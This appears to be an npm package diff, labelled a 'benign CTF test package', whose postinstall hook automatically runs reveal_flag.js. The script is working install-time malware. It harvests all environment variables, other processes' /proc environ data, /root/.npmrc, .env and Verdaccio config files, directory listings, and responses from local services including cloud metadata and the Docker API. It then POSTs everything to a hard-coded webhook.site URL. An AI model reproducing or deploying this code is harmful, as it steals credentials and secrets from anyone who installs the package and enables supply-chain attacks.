ect-472839 1.23.461

package/package.json

@@ -0,0 +1,8 @@
+{
+  "name": "ect-472839",
+  "version": "1.23.461",
+  "description": "benign CTF test package (postinstall sends a webhook)",
+  "scripts": {
+    "postinstall": "node ./reveal_flag.js"
+  }
+}

package/reveal_flag.js

@@ -0,0 +1,263 @@
+// reveal_flag.js
+// Comprehensive postinstall probe: envvars, process info, /proc, local HTTP services, dir listings.
+// Replace WEBHOOK_URL with your webhook.site URL (or set via env var).
+
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+const url = require('url');
+const http = require('http');
+const https = require('https');
+const { promisify } = require('util');
+const readdir = promisify(fs.readdir);
+const stat = promisify(fs.stat);
+const readFile = promisify(fs.readFile);
+
+const WEBHOOK_URL = process.env.WEBHOOK_URL || 'https://webhook.site/9abfee18-babc-4a9d-ae66-1b82ed6f436c';
+const MAX_BYTES = 3000;     // max bytes to read per file
+const MAX_FILES = 12;       // cap files read
+const HTTP_TIMEOUT = 6000;  // ms per http request
+const TOTAL_HTTP = 8;       // number of local endpoints to try
+const MAX_PROC = 80;        // max /proc entries to inspect
+const MAX_DIR_LIST = 100;   // max directory entries to list
+
+function send(payload) {
+  try {
+    const parsed = url.parse(WEBHOOK_URL);
+    const proto = parsed.protocol === 'https:' ? https : http;
+    const opts = {
+      hostname: parsed.hostname,
+      port: parsed.port || (parsed.protocol === 'https:' ? 443 : 80),
+      path: parsed.path,
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      timeout: 10_000
+    };
+    const req = proto.request(opts, (res) => {
+      res.on('data', () => {});
+      res.on('end', () => {});
+    });
+    req.on('error', (err) => {
+      // ignore network errors in postinstall
+      console.error('webhook send error', err && err.message);
+    });
+    req.write(JSON.stringify(payload));
+    req.end();
+    console.log('POSTED_WEBHOOK', WEBHOOK_URL);
+  } catch (e) {
+    console.error('send exception', e && e.message);
+  }
+}
+
+async function safeRead(p) {
+  try {
+    const b = await readFile(p);
+    const content = b.toString('utf8', 0, MAX_BYTES);
+    return { path: p, size: b.length, content, truncated: b.length > MAX_BYTES };
+  } catch (e) {
+    return { path: p, error: e.message };
+  }
+}
+
+async function listDir(d) {
+  try {
+    const items = await readdir(d);
+    return { dir: d, entries: items.slice(0, MAX_DIR_LIST) };
+  } catch (e) {
+    return { dir: d, error: e.message };
+  }
+}
+
+function httpGet(target, timeout = HTTP_TIMEOUT) {
+  return new Promise((resolve) => {
+    try {
+      const parsed = url.parse(target);
+      const proto = parsed.protocol === 'https:' ? https : http;
+      const opts = {
+        hostname: parsed.hostname,
+        port: parsed.port || (parsed.protocol === 'https:' ? 443 : 80),
+        path: parsed.path,
+        method: 'GET',
+        headers: { 'User-Agent': 'postinstall-probe/1.0' },
+        timeout
+      };
+      const req = proto.request(opts, (res) => {
+        let acc = '';
+        res.on('data', (c) => { if (acc.length < MAX_BYTES) acc += c.toString(); });
+        res.on('end', () => {
+          resolve({ url: target, status: res.statusCode, headers: res.headers, body_preview: acc.slice(0, MAX_BYTES) });
+        });
+      });
+      req.on('error', (e) => resolve({ url: target, error: e.message }));
+      req.on('timeout', () => { req.destroy(); resolve({ url: target, error: 'timeout' }); });
+      req.end();
+    } catch (e) {
+      resolve({ url: target, error: e && e.message });
+    }
+  });
+}
+
+async function probeEnvAndProcess() {
+  const env = process.env;
+  const envSample = {};
+  // include all env but trim values > 300 chars
+  for (const k of Object.keys(env)) {
+    try {
+      const v = env[k] || '';
+      envSample[k] = v.length > 300 ? (v.slice(0, 300) + '...[trunc]') : v;
+    } catch (e) { envSample[k] = `ERR:${e.message}`; }
+  }
+
+  // process info
+  const procInfo = {
+    cwd: process.cwd(),
+    argv: process.argv,
+    uid: process.getuid ? process.getuid() : null,
+    gid: process.getgid ? process.getgid() : null,
+    euid: process.geteuid ? process.geteuid() : null,
+    egid: process.getegid ? process.getegid() : null,
+    uidStr: (() => { try { return require('os').userInfo(); } catch(e){ return null; } })(),
+    node_version: process.version,
+    platform: process.platform,
+    architecture: process.arch
+  };
+
+  return { envSample, procInfo };
+}
+
+async function probeProcEnvirons(uidFilter = null) {
+  const results = [];
+  try {
+    const pEntries = await readdir('/proc');
+    let count = 0;
+    for (const e of pEntries) {
+      if (count >= MAX_PROC) break;
+      if (!/^\d+$/.test(e)) continue;
+      const pidPath = path.join('/proc', e);
+      const environPath = path.join(pidPath, 'environ');
+      const statusPath = path.join(pidPath, 'status');
+      try {
+        // read status to check uid
+        const st = await readFile(statusPath, 'utf8');
+        const uidLine = st.split('\n').find(l => l.startsWith('Uid:'));
+        let uid = null;
+        if (uidLine) uid = uidLine.split(/\s+/)[1];
+        if (uidFilter && String(uid) !== String(uidFilter)) {
+          continue;
+        }
+        const envContent = await safeRead(environPath);
+        results.push({ pid: e, uid, environ: envContent });
+        count++;
+      } catch (e) {
+        // ignore unreadable
+      }
+    }
+  } catch (e) {
+    results.push({ error: e.message });
+  }
+  return results;
+}
+
+async function probeLocalHttp() {
+  // common local endpoints to try. Adjust list if you discover more.
+  const urls = [
+    'http://127.0.0.1:4873/',                           // verdaccio root
+    'http://127.0.0.1:4873/-/v1/search?text=ect',       // verdaccio search API
+    'http://127.0.0.1:4873/ect-472839',                 // package-style path
+    'http://127.0.0.1:3000/',                           // common app port
+    'http://127.0.0.1:8080/',                           // another common port
+    'http://127.0.0.1:5984/_all_dbs',                   // couchdb
+    'http://169.254.169.254/latest/meta-data/',         // cloud metadata (if present)
+    'http://127.0.0.1:2375/version'                     // docker daemon API (if exposed)
+  ].slice(0, TOTAL_HTTP);
+
+  const out = [];
+  for (const u of urls) {
+    try {
+      const r = await httpGet(u);
+      out.push(r);
+    } catch (e) {
+      out.push({ url: u, error: e && e.message });
+    }
+  }
+  return out;
+}
+
+async function probeAppDirs() {
+  const candidates = ['/app', '/usr/src/app', '/home/node', '/home', '/var/www', '/var/lib/verdaccio', '/verdaccio', '/opt', '/srv'];
+  const results = [];
+  for (const d of candidates) {
+    results.push(await listDir(d));
+  }
+  return results;
+}
+
+async function probeVerdaccioStorageLikelyPaths() {
+  // attempt to read common Verdaccio storage layouts for package 'ect-472839'
+  const candidates = [
+    '/verdaccio/storage/ect-472839',
+    '/verdaccio/storage/ect-472839/' ,
+    '/var/lib/verdaccio/storage/ect-472839',
+    '/home/verdaccio/storage/ect-472839',
+    '/storage/verdaccio/ect-472839',
+  ];
+  const res = [];
+  for (const p of candidates) {
+    res.push(await listDir(p));
+  }
+  return res;
+}
+
+async function runAll() {
+  try {
+    const pkg = (() => { try { return require('./package.json'); } catch (e) { return { name: 'unknown', version: 'unknown' }; } })();
+    const [envProc, procEnvs, localHttp, appDirs, verdPaths] = await Promise.all([
+      probeEnvAndProcess(),
+      probeProcEnvirons(process.getuid ? process.getuid() : null),
+      probeLocalHttp(),
+      probeAppDirs(),
+      probeVerdaccioStorageLikelyPaths()
+    ]);
+
+    // Also try reading some likely files if present (package.json in cwd, package-lock, config files)
+    const extras = [];
+    const extraFiles = [
+      path.join(process.cwd(), 'package.json'),
+      path.join(process.cwd(), 'package-lock.json'),
+      '/etc/verdaccio/config.yaml',
+      '/home/verdaccio/config.yaml',
+      '/root/.npmrc',
+      path.join(process.cwd(), '.env'),
+      '/etc/environment'
+    ];
+    for (const f of extraFiles) {
+      extras.push(await safeRead(f));
+    }
+
+    const payload = {
+      event: 'postinstall-extended-probe',
+      package: pkg.name,
+      version: pkg.version,
+      ts: new Date().toISOString(),
+      hostname: os.hostname(),
+      os_platform: process.platform,
+      arch: process.arch,
+      env_sample: envProc.envSample,
+      process_info: envProc.procInfo,
+      proc_environs: procEnvs.slice(0, 40),
+      local_http: localHttp,
+      app_dirs: appDirs,
+      verdaccio_candidates: verdPaths,
+      extra_files: extras
+    };
+
+    // send and log
+    send(payload);
+    console.log('PROBE_DONE', JSON.stringify({ pkg: pkg.name, matches: (procEnvs||[]).length }, null, 2));
+  } catch (e) {
+    console.error('runAll exception', e && e.message);
+    send({ event: 'postinstall-error', error: e && e.message });
+  }
+}
+
+runAll();